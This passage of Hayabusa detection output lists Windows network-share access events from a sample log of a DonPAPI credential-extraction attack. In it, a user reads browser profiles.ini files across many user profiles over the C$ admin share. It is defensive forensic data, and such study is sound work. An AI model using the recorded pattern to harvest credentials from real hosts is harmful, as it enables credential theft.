+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 
+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.899 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.915 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.932 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.935 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.950 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.968 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.970 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.986 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.002 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 
+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.033 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.049 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 